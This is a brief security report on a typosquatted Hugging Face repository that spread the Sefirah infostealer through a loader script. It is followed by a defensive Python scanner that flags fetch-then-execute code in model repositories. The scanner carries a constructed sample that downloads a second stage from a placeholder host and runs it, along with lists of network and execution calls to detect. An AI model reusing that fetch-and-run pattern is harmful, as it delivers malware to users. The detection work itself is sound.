A malicious Hugging Face repository impersonated OpenAI’s “Privacy Filter” project and used a deceptive loader to deploy the Sefirah infostealer against Windows users. HiddenLayer found the typosquatted Open-OSS/privacy-filter campaign after it reached #1 on Hugging Face, gained 244,000 downloads, and was linked to related infrastructure and an npm typosquatting operation.
Key points
- A malicious Hugging Face repo impersonated OpenAI’s Privacy Filter project.
- The typosquatted repository briefly reached #1 and amassed 244,000 downloads.
- The loader.py script fetched and executed infostealer malware on Windows machines.
- The final payload, Sefirah, stole browser data, Discord tokens, wallet data, and credentials.
- HiddenLayer found anti-analysis checks and links to other malicious repositories and WinOS 4.0.
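
As an added illustration (not code from HiddenLayer's report or from the malicious repository), the following defender-side check statically parses the Python files in a downloaded model repository and flags any that both import a network module and call a code or process execution function, the fetch-then-execute behaviour attributed to loader.py above. The module and call lists, the function names and the sample source are assumptions constructed for this example.

```python
import ast
from pathlib import Path

# Assumed heuristic lists, chosen for this example (not taken from the report).
FETCH_MODULES = {"urllib", "requests", "httpx", "http", "socket"}
EXEC_CALLS = {"exec", "eval", "system", "popen", "Popen", "run",
              "call", "check_call", "check_output", "startfile"}

def audit_source(source, filename="<repo file>"):
    """Report network imports and code/process execution calls in one file."""
    tree = ast.parse(source, filename=filename)
    fetch, execs = [], []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            modules = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            modules = [node.module or ""]
        else:
            modules = []
        fetch += [(node.lineno, m) for m in modules
                  if m.split(".")[0] in FETCH_MODULES]
        if isinstance(node, ast.Call):
            func = node.func
            name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
            if name in EXEC_CALLS:
                execs.append((node.lineno, name))
    return {"file": filename, "fetch": sorted(fetch), "exec": sorted(execs),
            "fetch_and_execute": bool(fetch and execs)}

def audit_repo(root):
    """Return files in a local repo snapshot that need review before use."""
    flagged = []
    for path in sorted(Path(root).rglob("*.py")):
        try:
            hit = audit_source(path.read_text(errors="replace"), str(path))["fetch_and_execute"]
        except (SyntaxError, ValueError):
            hit = True  # unparseable Python in a model repo also needs review
        if hit:
            flagged.append(str(path))
    return flagged

# Constructed sample (only parsed by the audit, never executed).
SAMPLE_LOADER = '''
import urllib.request, subprocess
data = urllib.request.urlopen("https://example.invalid/stage2").read()
open("stage2.bin", "wb").write(data)
subprocess.Popen(["stage2.bin"])
'''
```

The check is a coarse triage heuristic: a flagged file needs manual review, and an unflagged file is not thereby shown to be safe.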